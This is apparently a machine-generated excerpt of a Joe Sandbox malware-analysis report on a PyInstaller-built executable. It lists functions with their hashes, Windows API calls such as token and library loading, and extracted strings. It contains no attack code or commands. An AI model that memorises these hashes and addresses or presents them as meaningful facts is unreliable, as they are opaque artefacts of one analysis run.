                                                                      • Opcode ID: bbe49b361f6b02a2f9750cfc56697fc2c071dae7ca02d99c21af6610391908d0
                                                                      • Instruction ID: 45c5d02c14a3be5487aee26aa80a439cb3c8c56b86c346533766f8fa836634b5
                                                                      • Opcode Fuzzy Hash: bbe49b361f6b02a2f9750cfc56697fc2c071dae7ca02d99c21af6610391908d0
                                                                      • Instruction Fuzzy Hash: 6861B022D2C243D6F678BB25955427EE695EF98780FD84435CD0E02EAAFE7CE8408230
                                                                      APIs
                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF76D5CD29A,?,?,?,00007FF76D5CCF8C,?,?,?,00007FF76D5CCB89), ref: 00007FF76D5CD06D
                                                                      • GetLastError.KERNEL32(?,?,?,00007FF76D5CD29A,?,?,?,00007FF76D5CCF8C,?,?,?,00007FF76D5CCB89), ref: 00007FF76D5CD07B
                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF76D5CD29A,?,?,?,00007FF76D5CCF8C,?,?,?,00007FF76D5CCB89), ref: 00007FF76D5CD0A5
                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF76D5CD29A,?,?,?,00007FF76D5CCF8C,?,?,?,00007FF76D5CCB89), ref: 00007FF76D5CD113
                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF76D5CD29A,?,?,?,00007FF76D5CCF8C,?,?,?,00007FF76D5CCB89), ref: 00007FF76D5CD11F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                      • String ID: api-ms-
                                                                      • API String ID: 2559590344-2084034818
                                                                      • Opcode ID: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                                      • Instruction ID: 74358a6a3c4ddc56717f919ded47983f850b968a7d66a014d21fbbc1527b9100
                                                                      • Opcode Fuzzy Hash: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                                      • Instruction Fuzzy Hash: BB31E82566EB42C1EE15FB1AA400575A394BF88B65FD9053ADD1D57B42FF3CE0428B30
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                      • String ID: Unhandled exception in script$[oV116
                                                                      • API String ID: 3081866767-1141572857
                                                                      • Opcode ID: a6e7d290dc67b0bb036b84f18c740492a81528deb91c8b42bdc3829a80364304
                                                                      • Instruction ID: 609efc2a4745c317c5030dfd28b771cd4af625adbb1b43f507c9b1ac438cc0d9
                                                                      • Opcode Fuzzy Hash: a6e7d290dc67b0bb036b84f18c740492a81528deb91c8b42bdc3829a80364304
                                                                      • Instruction Fuzzy Hash: 50313F7262D682C5EB20BB61E8552E9B360FB89784F840135EE4D47F56EF3CD1058724
                                                                      APIs
                                                                        • Part of subcall function 00007FF76D5C7B50: GetCurrentProcess.KERNEL32 ref: 00007FF76D5C7B70
                                                                        • Part of subcall function 00007FF76D5C7B50: OpenProcessToken.ADVAPI32 ref: 00007FF76D5C7B83
                                                                        • Part of subcall function 00007FF76D5C7B50: GetTokenInformation.ADVAPI32 ref: 00007FF76D5C7BA8
                                                                        • Part of subcall function 00007FF76D5C7B50: GetLastError.KERNEL32 ref: 00007FF76D5C7BB2
                                                                        • Part of subcall function 00007FF76D5C7B50: GetTokenInformation.ADVAPI32 ref: 00007FF76D5C7BF2
                                                                        • Part of subcall function 00007FF76D5C7B50: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF76D5C7C0E
                                                                        • Part of subcall function 00007FF76D5C7B50: CloseHandle.KERNEL32 ref: 00007FF76D5C7C26
                                                                      • LocalFree.KERNEL32(?,00007FF76D5C3814), ref: 00007FF76D5C848C
                                                                      • LocalFree.KERNEL32(?,00007FF76D5C3814), ref: 00007FF76D5C8495
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                      • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!$[oV116
                                                                      • API String ID: 6828938-1232413876
                                                                      • Opcode ID: 795f95526d0a951be163d7ee57e77295e71c5006ab84a191c0455a0dace466c7
                                                                      • Instruction ID: 4e6e39f8fb2ee8cd2591a199544433e29ff7c5248a70f14e8b0feb9204e49fda
                                                                      • Opcode Fuzzy Hash: 795f95526d0a951be163d7ee57e77295e71c5006ab84a191c0455a0dace466c7
                                                                      • Instruction Fuzzy Hash: A1212C21A2C642C2E650BB10E4552EAA2A5FB88784FC4403AEE4D57B97EE3CD8458B70
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                      • String ID:
                                                                      • API String ID: 995526605-0
                                                                      • Opcode ID: cb4766db9d01b9dd8e968687fe92956989c3d0e6154c1ea64db8f8bdde092e2e
                                                                      • Instruction ID: c6239d03bfcab29e8c8e1406a08318e42d2e3cc7d99674f6556714ee47cc68a3
                                                                      • Opcode Fuzzy Hash: cb4766db9d01b9dd8e968687fe92956989c3d0e6154c1ea64db8f8bdde092e2e
                                                                      • Instruction Fuzzy Hash: DC212121E1CB4382EB10BB55A44422AE7A1EB857A5F900639DE7D43ED6EF6CD4458B20
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: Message$ByteCharMultiWide
                                                                      • String ID: %s%s: %s$Error$Error/warning (ANSI fallback)$[oV116
                                                                      • API String ID: 1878133881-3727763148
                                                                      • Opcode ID: 185a5ded7e4d76afdc6dde510c40398ff569d270283616bd23a067f5071c39f1
                                                                      • Instruction ID: 717f1ca66979865fc5c786b3c2831773d00d59b48c524b8df2ad7bfa9f92ad9f
                                                                      • Opcode Fuzzy Hash: 185a5ded7e4d76afdc6dde510c40398ff569d270283616bd23a067f5071c39f1
                                                                      • Instruction Fuzzy Hash: 3D21217263C786C1E720BB10E4517EAA364FB88784F801136EA8D13A5AEF7CD645CB64
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                      • String ID: CONOUT$
                                                                      • API String ID: 3230265001-3130406586
                                                                      • Opcode ID: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                                      • Instruction ID: 6c067c9143ad5e9d92f9a18da1a36c34864403abf882b79d6ada97431a994f69
                                                                      • Opcode Fuzzy Hash: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                                      • Instruction Fuzzy Hash: 1E118E21A2CB42C6E750BB02E844329A2A1FB8CBE5F840234EE1D87B96EF3CD504C750
                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,?,00007FF76D5D43FD,?,?,?,?,00007FF76D5D979A,?,?,?,?,00007FF76D5D649F), ref: 00007FF76D5DA5E7
                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF76D5D43FD,?,?,?,?,00007FF76D5D979A,?,?,?,?,00007FF76D5D649F), ref: 00007FF76D5DA61D
                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF76D5D43FD,?,?,?,?,00007FF76D5D979A,?,?,?,?,00007FF76D5D649F), ref: 00007FF76D5DA64A
                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF76D5D43FD,?,?,?,?,00007FF76D5D979A,?,?,?,?,00007FF76D5D649F), ref: 00007FF76D5DA65B
                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF76D5D43FD,?,?,?,?,00007FF76D5D979A,?,?,?,?,00007FF76D5D649F), ref: 00007FF76D5DA66C
                                                                      • SetLastError.KERNEL32(?,?,?,00007FF76D5D43FD,?,?,?,?,00007FF76D5D979A,?,?,?,?,00007FF76D5D649F), ref: 00007FF76D5DA687
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: Value$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 2506987500-0
                                                                      • Opcode ID: 7696e44328a1602cd582e56c236ae7bac79167df8c45cc5896bb346a15a7f285
                                                                      • Instruction ID: 02b868a37af12cb0df3e4e5ffc436b19244db83960c4533d725fe938b630bb10
                                                                      • Opcode Fuzzy Hash: 7696e44328a1602cd582e56c236ae7bac79167df8c45cc5896bb346a15a7f285
                                                                      • Instruction Fuzzy Hash: 8A115B20E2C642C2FA647725566157AE2425F587A0F844334DC3E47EDBFE2CB4018739
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                      • String ID: [oV116
                                                                      • API String ID: 2718003287-247592185
                                                                      • Opcode ID: 0739f85a4d911baae0561c1f2f5b651aa469f8b70ac1dc09fd50f765aaaafbc7
                                                                      • Instruction ID: 51eb6e5c2796886c7b9392c636550f425dff08be3fa3c59efa90b4c89deca0fa
                                                                      • Opcode Fuzzy Hash: 0739f85a4d911baae0561c1f2f5b651aa469f8b70ac1dc09fd50f765aaaafbc7
                                                                      • Instruction Fuzzy Hash: C7D10672B2CA81C9E710EF65D4502AC77B2FB44798B944235CE6E57F9AEE38D006C324
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: _get_daylight$_isindst
                                                                      • String ID: [oV116
                                                                      • API String ID: 4170891091-247592185
                                                                      • Opcode ID: 8f9731ccc05e5e98dab1658fcebd939f282d40e9b6d5561daf5942648b351509
                                                                      • Instruction ID: 3c9ebd213e546857d7f11909ad27d2a61cb7b56a075b9642ba21f16a124c2aad
                                                                      • Opcode Fuzzy Hash: 8f9731ccc05e5e98dab1658fcebd939f282d40e9b6d5561daf5942648b351509
                                                                      • Instruction Fuzzy Hash: 27510872F18111CAEB18FF6499A16BCE7A1AB44359F900235DD2D96EE6EF38A4018720
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                      • String ID: [oV116
                                                                      • API String ID: 2780335769-247592185
                                                                      • Opcode ID: 44011dbc5c196255e5d063134f532b0674048b95aab6dcf0e225215e54208c6d
                                                                      • Instruction ID: f51ffc6533edf02ab3b870bd225a4aa94235db5e943870c46a2de1ff293c5982
                                                                      • Opcode Fuzzy Hash: 44011dbc5c196255e5d063134f532b0674048b95aab6dcf0e225215e54208c6d
                                                                      • Instruction Fuzzy Hash: 0B519022A28641CAFB10EF71D4613BDA3A1EB5CB98F508135DE1957A9AEF38D4818734
                                                                      APIs
                                                                      • CreateDirectoryW.KERNEL32(00000000,?,00007FF76D5C324C,?,?,00007FF76D5C3964), ref: 00007FF76D5C7642
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDirectory
                                                                      • String ID: %.*s$%s%c$[oV116$\
                                                                      • API String ID: 4241100979-3064393157
                                                                      • Opcode ID: 1156698ca0d33aa8d2468b4f0fdefbfa17a3fd1640f2d1a941dba21d9585616c
                                                                      • Instruction ID: 34878bade6f2a169e299abda865b778c46e2aea461ab8f349b0c133f793c5391
                                                                      • Opcode Fuzzy Hash: 1156698ca0d33aa8d2468b4f0fdefbfa17a3fd1640f2d1a941dba21d9585616c
                                                                      • Instruction Fuzzy Hash: 1D31BA21B2DAC5C5EA21A715E4107E6A254EB94BE4F844235EE6D43FC6FF3CD2458B20
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: Message$ByteCharMultiWide
                                                                      • String ID: Error$Error/warning (ANSI fallback)$[oV116
                                                                      • API String ID: 1878133881-3922459162
                                                                      • Opcode ID: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                                      • Instruction ID: 58c539b24cf601d68934e0dd18d3760c98d0f56d8f1a08c7835b8e1f7310e481
                                                                      • Opcode Fuzzy Hash: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                                      • Instruction Fuzzy Hash: 63115E6263CB86C1EB20AB10E451BA9B364FB48785FD05139DE9D17A56EF3CD605CB20
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: Message$ByteCharMultiWide
                                                                      • String ID: Error/warning (ANSI fallback)$Warning$[oV116
                                                                      • API String ID: 1878133881-513610321
                                                                      • Opcode ID: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                                      • Instruction ID: a1e3e820adbdf5d9d0056f378c3c9860ad9a4cc396f98fe983883545f52af3f1
                                                                      • Opcode Fuzzy Hash: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                                      • Instruction Fuzzy Hash: 00118E6263CB86C1EB20AB00E451BA9B364FB48784FD01139DE9C57A46EF3CD604CB20
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                      • String ID: [oV116
                                                                      • API String ID: 2933794660-247592185
                                                                      • Opcode ID: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                                      • Instruction ID: f0afdc3d5d5b05beda3da0936d3a40748ff4e0c8b6a0eda82b7508a2a39b0d53
                                                                      • Opcode Fuzzy Hash: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                                      • Instruction Fuzzy Hash: 7D114F22B28B05C9EB00AB60E8442B973A4FB59759F440E31DE6D86BA5EF78D1548350
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      • Opcode ID: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                                      • Instruction ID: 6791fe7d6ae47f2166580b93635099f42453476462a87e24ff5da961499b015b
                                                                      • Opcode Fuzzy Hash: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                                      • Instruction Fuzzy Hash: 77F0AF61A2C742C2EB14BB24A454379A320AF897A2FD80735CD6D4A9E5EF2CD049C720
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2065249418.00007FFDF7591000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7590000, based on PE: true
                                                                      • Associated: 00000003.00000002.2065208085.00007FFDF7590000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2065249418.00007FFDF76E2000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2065249418.00007FFDF76E4000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2065249418.00007FFDF76F9000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2066155855.00007FFDF76FB000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2066216002.00007FFDF76FD000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffdf7590000_Built.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: DELETE FROM %Q.sqlite_master WHERE name=%Q AND type='index'$idx$index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped$no such index: %S$sqlite_master$sqlite_temp_master
                                                                      • API String ID: 0-3044004295
                                                                      • Opcode ID: df71e167fbaea4de0386259c4b89394a60b239a7a74b635967c12bf119c983b6
                                                                      • Instruction ID: 3d004a9ddfefe1c46a8bc1cb3f30a2a51f436952942fb05e2b455ac12dde41fc
                                                                      • Opcode Fuzzy Hash: df71e167fbaea4de0386259c4b89394a60b239a7a74b635967c12bf119c983b6
                                                                      • Instruction Fuzzy Hash: 6551866AB0878682EB61DF16E420AE977A4FF85B84F54403ADE9D4BBD9DF3CD4448340
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
